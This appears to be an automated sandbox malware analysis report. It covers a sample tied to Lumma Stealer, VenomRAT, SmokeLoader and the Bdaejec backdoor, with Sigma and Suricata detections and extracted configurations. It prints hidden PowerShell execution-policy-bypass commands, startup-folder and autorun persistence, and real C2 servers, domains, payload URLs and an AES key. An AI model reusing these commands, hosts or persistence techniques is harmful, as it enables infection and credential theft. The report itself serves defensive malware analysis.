
Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\753F.exe, ParentImage: C:\Users\user\AppData\Local\Temp\753F.exe, ParentProcessId: 4688, ParentProcessName: 753F.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 6872, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\753F.exe, ParentImage: C:\Users\user\AppData\Local\Temp\753F.exe, ParentProcessId: 4688, ParentProcessName: 753F.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 6872, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3968, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , ProcessId: 7068, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\753F.exe, ParentImage: C:\Users\user\AppData\Local\Temp\753F.exe, ParentProcessId: 4688, ParentProcessName: 753F.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 6872, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\F6D9.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 3968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#6110_8yUscnjrUY

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ftejced, CommandLine: C:\Users\user\AppData\Roaming\ftejced, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ftejced, NewProcessName: C:\Users\user\AppData\Roaming\ftejced, OriginalFileName: C:\Users\user\AppData\Roaming\ftejced, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Users\user\AppData\Roaming\ftejced, ProcessId: 1240, ProcessName: ftejced

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\753F.exe, ProcessId: 4688, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwvtgaet.uft.ps1

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3968, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , ProcessId: 7068, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\753F.exe, ParentImage: C:\Users\user\AppData\Local\Temp\753F.exe, ParentProcessId: 4688, ParentProcessName: 753F.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 6872, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.10 - Destination IP: 64.190.113.113

Timestamp:	2024-07-24T19:56:24.675453+0200
SID:	2019714
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-24T19:57:04.292679+0200
SID:	2054602
Source Port:	49772
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (callosallsaospz .shop) - Source IP: 192.168.2.10 - Destination IP: 1.1.1.1

Timestamp:	2024-07-24T19:56:50.332358+0200
SID:	2054591
Source Port:	64465
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:26.536004+0200
SID:	2054604
Source Port:	49790
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-24T19:56:56.104324+0200
SID:	2054602
Source Port:	49762
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:18.343059+0200
SID:	2054653
Source Port:	49780
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.10 - Destination IP: 1.1.1.1

Timestamp:	2024-07-24T19:55:04.239382+0200
SID:	2838522
Source Port:	51349
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.10 - Destination IP: 1.1.1.1

Timestamp:	2024-07-24T19:55:06.316845+0200
SID:	2838522
Source Port:	51349
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-24T19:57:02.045424+0200
SID:	2054602
Source Port:	49769
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:31.288308+0200
SID:	2054604
Source Port:	49793
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:36.718743+0200
SID:	2054604
Source Port:	49797
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Malicious SSL Cert (VenomRAT) - Source IP: 94.156.79.190 - Destination IP: 192.168.2.10

Timestamp:	2024-07-24T19:58:10.395667+0200
SID:	2052267
Source Port:	4449
Destination Port:	49821
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-24T19:56:52.823568+0200
SID:	2054653
Source Port:	49756
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-24T19:56:51.530840+0200
SID:	2054653
Source Port:	49754
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (liernessfornicsa .shop) - Source IP: 192.168.2.10 - Destination IP: 1.1.1.1

Timestamp:	2024-07-24T19:57:17.023516+0200
SID:	2054593
Source Port:	51893
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-24T19:56:57.773404+0200
SID:	2054602
Source Port:	49765
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:40.123477+0200
SID:	2054604
Source Port:	49800
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-24T19:56:52.312670+0200
SID:	2054602
Source Port:	49756
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T19:55:40.357738+0200
SID:	2807908
Source Port:	49711
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T19:55:43.508123+0200
SID:	2807908
Source Port:	49716
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:40.591985+0200
SID:	2054653
Source Port:	49800
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-24T19:56:54.697261+0200
SID:	2048094
Source Port:	49760
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-24T19:56:50.928961+0200
SID:	2054602
Source Port:	49754
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-24T19:56:54.154691+0200
SID:	2054602
Source Port:	49760
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-24T19:56:59.871319+0200
SID:	2054602
Source Port:	49767
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:17.531048+0200
SID:	2054604
Source Port:	49780
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:18.875038+0200
SID:	2054604
Source Port:	49782
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:22.094261+0200
SID:	2054604
Source Port:	49785
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:24.551102+0200
SID:	2048094
Source Port:	49787
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:45.110905+0200
SID:	2054653
Source Port:	49803
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-24T19:57:05.217652+0200
SID:	2054653
Source Port:	49772
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:41.841093+0200
SID:	2054604
Source Port:	49803
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:22.834216+0200
SID:	2048094
Source Port:	49785
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:19.383145+0200
SID:	2054653
Source Port:	49782
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T19:55:09.065962+0200
SID:	2807908
Source Port:	49703
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T19:55:40.788193+0200
SID:	2807908
Source Port:	49712
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T19:55:43.046215+0200
SID:	2807908
Source Port:	49715
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.10 - Destination IP: 172.67.213.85

Timestamp:	2024-07-24T19:57:24.046577+0200
SID:	2054604
Source Port:	49787
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.10 - Destination IP: 1.1.1.1

Timestamp:	2024-07-24T19:55:05.253162+0200
SID:	2838522
Source Port:	51349
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T19:55:41.395577+0200
SID:	2807908
Source Port:	49713
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 7Y18r(14).exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar	Avira URL Cloud: Label: phishing
Source: http://gebeus.ru/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://cx5519.com/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://evilos.cc/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rar	Avira URL Cloud: Label: phishing
Source: https://mussangroup.com/wp-content/images/pic1.jpg	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar6	Avira URL Cloud: Label: phishing
Source: https://callosallsaospz.shop/api	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rarB	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rarO	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B

Found malware configuration

Source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: VenomRAT {"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null"}
Source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null", "External_config_on_Pastebin": "false"}
Source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}
Source: BitLockerToGo.exe.4216.31.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "bOKHNM--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\B552.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\ftejced	ReversingLabs: Detection: 94%

Multi AV Scanner detection for submitted file

Source: 7Y18r(14).exe

ReversingLabs: Detection: 94%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 7Y18r(14).exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: indexterityszcoxp.shop
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: lariatedzugspd.shop
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: callosallsaospz.shop
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: outpointsozp.shop
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: liernessfornicsa.shop
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: upknittsoappz.shop
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: shepherdlyopzc.shop
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: unseaffarignsk.shop
Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmp	String decryptor: liernessfornicsa.shop
